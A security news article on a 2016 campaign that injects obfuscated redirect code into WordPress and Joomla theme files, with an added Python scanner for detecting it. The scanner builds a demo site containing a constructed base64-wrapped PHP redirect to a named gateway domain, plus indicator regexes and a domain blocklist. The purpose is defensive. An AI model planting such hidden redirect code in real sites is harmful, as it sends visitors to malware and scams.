WordPress Redirect Hack Sends Web Traffic to Malicious URLs
Security researchers at Sucuri have today exposed an ongoing attack on WordPress sites that modifies their source code and quietly redirects visitors to malicious websites.
According to an investigation by Sucuri's John Castro, the attackers exploit vulnerabilities in older versions of WordPress or of WordPress plugins to gain access to a site, and then edit the active theme's header.php file, appending 12 lines of obfuscated code.
Sucuri says that in several cases the attackers obtained the site's admin credentials by other means and simply logged in through the regular login page, which gives access to WordPress's built-in theme editor, and added the malicious code by hand.
Joomla sites are also affected.
The security firm also points out that, beyond WordPress, it has observed the same malicious code added to Joomla sites in the administrator/includes/help.php file. However, the number of affected Joomla sites is much smaller.
Tweet from Sucuri (@sucurisecurity), May 11, 2016: "We discovered a WordPress Redirect Hack via Test0 .com/Default7 .com https://t.co/8ouc4CuG7P by @unmaskparasites pic.twitter.com/HQsrQb5eFk"
Sucuri says the campaign is still ongoing and that, in an earlier version, the attackers added the same obfuscated code to the theme's footer.php file.
After extracting the malicious code, the security firm says the functionality it found is simple but effective. On every affected site the code selects incoming visitors with a 15 percent probability and redirects them to a predetermined URL. It also sets a cookie in the visitor's browser so that the same visitor is not redirected again for the following year.
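The description above gives a defender enough to triage an install: the injection lives in the theme's header.php or footer.php (or Joomla's administrator/includes/help.php), it is obfuscated, and when unwrapped it contains a random gate, a Location redirect to one of the gateway domains and a long-lived cookie. The scanner below is an added example, not Sucuri's detection logic or the actual injected code. It walks an install, analyses only the files the article names, unwraps long base64 string literals so that an eval(base64_decode(...)) wrapper does not hide the redirect, and flags a file when it references a known gateway domain or matches at least two of the assumed indicators. The indicator regexes, the two-hit threshold and the sample files are assumptions; the sample "injected" footer is a constructed stand-in built from the behaviour described in the article, not the real 12-line payload.

```python
"""Scan the theme and Joomla files named in the article for the injected redirect code.

Added example; this is not Sucuri's detection logic. The indicator patterns and the
base64-unwrapping step are assumptions about how such injections typically look.
"""
import base64
import os
import re
import tempfile

# Files the article names as injection points: WordPress theme header.php / footer.php
# and Joomla's administrator/includes/help.php.
TARGET_BASENAMES = {"header.php", "footer.php", "help.php"}

# Gateway domains named in the article (defanging brackets removed so they match raw source).
GATEWAY_DOMAINS = ("default7.com", "test246.com", "test0.com",
                   "distinctfestive.com", "ableoccassion.com")

# Assumed indicators of obfuscated redirect logic: the article describes a random 15 percent
# gate, a Location redirect and a one-year cookie, typically wrapped in eval/base64.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "location_header": re.compile(r"header\s*\(\s*['\"]Location:", re.IGNORECASE),
    "setcookie": re.compile(r"\bsetcookie\s*\("),
    "random_gate": re.compile(r"\b(?:mt_)?rand\s*\(\s*\d+\s*,\s*\d+\s*\)"),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")


def decode_base64_literals(source):
    """Return the decoded text of every long base64-looking string literal in source."""
    decoded = []
    for literal in B64_LITERAL.findall(source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not base64 after all
            continue
    return decoded


def analyse_source(source):
    """Match indicators and gateway domains in the source and in any base64 layer it carries."""
    hits, domains = set(), set()
    for layer in [source] + decode_base64_literals(source):
        hits.update(name for name, rx in INDICATORS.items() if rx.search(layer))
        domains.update(d for d in GATEWAY_DOMAINS if d in layer)
    # A known gateway domain is conclusive; otherwise require two indicators to limit noise.
    return {"indicators": sorted(hits), "domains": sorted(domains),
            "suspicious": bool(domains) or len(hits) >= 2}


def scan_site(root):
    """Walk an install and analyse every file whose name is an injection target."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name in TARGET_BASENAMES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings[os.path.relpath(path, root)] = analyse_source(fh.read())
    return findings


# Constructed samples (not the real injection): a clean theme header and a footer carrying
# a base64-wrapped stand-in for the redirect logic the article describes.
CLEAN_HEADER = """<?php /* constructed sample header */ ?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head><meta charset="<?php bloginfo( 'charset' ); ?>"><?php wp_head(); ?></head>
<body <?php body_class(); ?>>
"""
_PAYLOAD = """if (!isset($_COOKIE['visited']) && mt_rand(1, 100) <= 15) {
    setcookie('visited', '1', time() + 365 * 24 * 3600, '/');
    header('Location: http://default7.com/');
    exit;
}"""
INJECTED_FOOTER = ("<?php eval(base64_decode('"
                   + base64.b64encode(_PAYLOAD.encode()).decode() + "')); ?>\n"
                   "<?php wp_footer(); ?></body></html>\n")


def build_demo_site():
    """Write the constructed samples into a temporary install layout and return its root."""
    root = tempfile.mkdtemp(prefix="wp_scan_demo_")
    theme = os.path.join(root, "wp-content", "themes", "demo")
    os.makedirs(theme)
    with open(os.path.join(theme, "header.php"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_HEADER)
    with open(os.path.join(theme, "footer.php"), "w", encoding="utf-8") as fh:
        fh.write(INJECTED_FOOTER)
    return root


if __name__ == "__main__":
    for rel, result in sorted(scan_site(build_demo_site()).items()):
        flag = "SUSPICIOUS" if result["suspicious"] else "clean"
        print(f"{flag:10} {rel} indicators={result['indicators']} domains={result['domains']}")
```

Point scan_site at a real document root to triage an install. Treat the output as a lead, not a verdict: some legitimate themes and plugins call base64_decode or set cookies, so confirm a hit by diffing the flagged file against a pristine copy of the theme from the vendor, and remember that removing the injected lines without patching the outdated core or plugin, or rotating the admin credentials the attackers used, only invites reinfection.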
The malicious sites are gateways to more dangerous threats.
The domains to that the attacker transmits the users are default7[.]com, test246[.]com, test0[.]com, distinctfestive[.]com, and ableoccassion[.]com.
Sucuri says these are simple gateways to other, more dangerous domains. Once a user lands on one of these gateways, they are redirected onward to any of many other malicious sites.
In one case observed by Sucuri, users running Internet Explorer were redirected to websites that pushed malware downloads disguised as legitimate Adobe Flash or Java updates.
Jerome Segura of Malwarebytes also said that his company saw the same gateway domains redirecting users to tech support scams.
At least 6,400 sites are affected.
Because of differing PHP setups and some sloppy coding in the malicious PHP itself, the injected code generated an error on several affected websites.